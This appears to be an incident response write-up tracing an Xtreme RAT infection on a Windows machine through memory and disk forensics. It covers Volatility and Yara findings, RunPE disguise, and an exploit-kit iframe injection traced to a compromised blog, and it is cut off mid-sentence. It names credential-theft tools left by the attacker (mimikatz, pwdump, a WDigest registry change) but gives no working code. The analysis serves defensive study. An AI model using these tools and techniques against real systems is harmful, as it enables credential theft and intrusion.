Overview of attack

A memory dump was taken shortly after the attack was discovered. The image was analyzed
utilizing Volatility. The following commands were run with results shown:


Suggested Profile: Win10x86_44B89EEA
DTB: 0x1a8000L
KDBG: 0x8248b000L
KPCR: 0x8248b000L

From this point, Volatility will be run specifying these parameters:

–dtb=0x1a8000 –kdbg=0x82461820 –kpcr=0x8248b000 –profile=Win10x86_44B89EEA

Yara rules from previous known compromises were collected to be run against the memory

The memory image was scanned using Volatility’s yarascan plugin with the following results:

All of the rules that were triggered were counted:

It was determined that the hits for SharedStrings and Spyeeye_plugins were likely false
positives. The hits for UPX were possibly interesting as benign processes aren’t usually UPX
packed. The hits for With_Sqlite were not definitive at this time because benign processes can
also use Sqlite. The hits for Xtreme, xtreme_rat, and xtremrat were considered interesting finds
because this is likely evidence of a malware execution.

The malicious processes involving Xtreme RAT were also the same processes that UPX packed
coded were detected on. These three processes were:

Suspected processes:

• svchost.exe (Pid: 4888)
• explorer.exe (Pid: 4872)
• update.exe (Pid: 5172)

At this point it was determined that the system was infected with Xtreme RAT malware.

A process list scan was then run on the image with Volatility:

Based on the System process start time, it was determined that the system was started at
12:54:24 on 8-16-2016 (UTC).

The process list was further refined searching for the pids of the malicious processes found in
the previous step:

Parent pid was determined for the malicious processes:

• svchost.exe (Pid: 4888) (Parent Pid: 4748)

• explorer.exe (Pid: 4872) (Parent Pid: 4748)
• update.exe (Pid: 5172) (Parent Pid: 5860)

It was determined that the malicious processes started shortly after system boot, around
13:02:57. At this point it is inconclusive if it is a fresh infection or something that was launched
by a persistence mechanism. It was further discovered that update.exe spawned several
command shells at the following times:

• 2016-08-16 13:07:36
• 2016-08-16 13:42:12
• 2016-08-16 14:08:30
• 2016-08-16 14:18:48
• 2016-08-16 14:23:02
• 2016-08-16 14:23:46

The dlllist Volatility plugin was then utilized to determine the command line which was used to
start each malicious process:

It was also determined that there were two explorer processes running on the system when
one explorer process is the norm.

Explorer.exe with PID 4872 was started using the original Windows executable, though it is not
the main explorer.exe process which was started when user logged in (PID:2068). This suggest
that malware is using a RunPE technique as a form of its disguise.

The memory image was then scanned for network connections using the netscan Volatility

It was determined that some connections utilizing nonstandard TCP ports were created along
with traffic on TCP port 80 (HTTP) and 443 (HTTPS). Remote addresses and processes IDs were
not able to be retrieved with this scan.

Memory analysis summary

Based on basic memory analysis, the following was concluded:

• The system was most likely infected with Xtreme RAT malware which code was found in
the memory of at least three processes.

• Malware is possibly using RunPE technique to hide its presence in the system.
• Some connections to strange tcp ports were observed.
• The following paths to suspicious executables were found:

o %APPDATA%HostDataupdate.exe
• The following timestamps were noted:

o 2016-08-16 13:02:57 UTC+0000 (start of svchost.exe)
o 2016-08-16 13:02:58 UTC+0000 (start of explorer.exe)

o 2016-08-16 13:03:04 UTC+0000 (start of update.exe)
o 2016-08-16 13:07:36 UTC+0000 (start of cmd.exe)
o 2016-08-16 13:42:12 UTC+0000 (start of cmd.exe)
o 2016-08-16 14:08:30 UTC+0000 (start of cmd.exe)
o 2016-08-16 14:18:48 UTC+0000 (start of cmd.exe)
o 2016-08-16 14:23:02 UTC+0000 (start of cmd.exe)
o 2016-08-16 14:23:46 UTC+0000 (start of cmd.exe)

A full forensic disk image was also taken after the memory dump. The disk image was mounted
on a forensics workstation and several searches were done:

Antivirus scan – ClamAV was run against the mounted file system to search for known malware:

• One file in Firefox cache folder supposedly contains CVE-2012-3993 exploit code, while
another file in INetCache folder (3568226350[1].exe) contains executable with Xtreme
RAT. This is a pretty valuable reference as it might point to the initial attack vector.

• There is a svchost.exe executable at %TEMP%svchost.exe likely containing copy of
Xtreme RAT.

• Some suspicious executables are stored at %APPDATAEpUpdate directory.
• ClamAV scan confirmed that previously found %APPDATA%HostDataupdate.exe

contains code of Xtreme RAT.

The EPUpdate directory contained multiple folders and tools possibly used during the attack:

• bpd/ – BrowserPasswordDump.exe
• mmktz/ – mimikatz

• nircmd/ – NirCmd
• nmap/ – Nmap
• pwdump/ – Pwdump
• ssh/ – plink, pscp
• thc/ – THC Hydra
• passwords.txt – list of common passwords
• wdigest.reg – REG file changing UseLogonCredential value in WDigest registry subkey

It was further determined that at 13:10:03, suspicious executable 54948tp.exe was created at
%TEMP% path.

The web browser history was enumerated and it was determined that on the day of the
incident, 8/16/2016, the user was visiting Reddit and then entered some website at the address
http://blog.mycompany.ex/. No other websites were visited directly by the user. Moreover it
was concluded that on the day of the investigation, domain blog.mycompany.ex was resolving

Examining the Firefox browser cache determined that shortly after visiting the
blog.mycompany.ex website, multiple other files were downloaded from another domain,

The pattern of files downloaded from blog.mysportclub.ex suggests that it may be an Exploit
Kit. Further examination of blog.mycompany.ex.htm shows a strange script being called:

this script does is an injection of iframe element pointing to
http://blog.mysportclub.ex/wpcontent/uploads/hk/task/opspy/index.php. This is a very
important observation because it tells us that blog.mysportclub.ex website was most likely
infected with malicious code injecting iframe element redirecting to Exploit-Kit landing page.

Further evidence of multiple exploits on the website can be found in the file –
/wpcontent/uploads/hk/task/opspy/index.php file (previously saved to blog.mysportclub.ex as

It contains multiple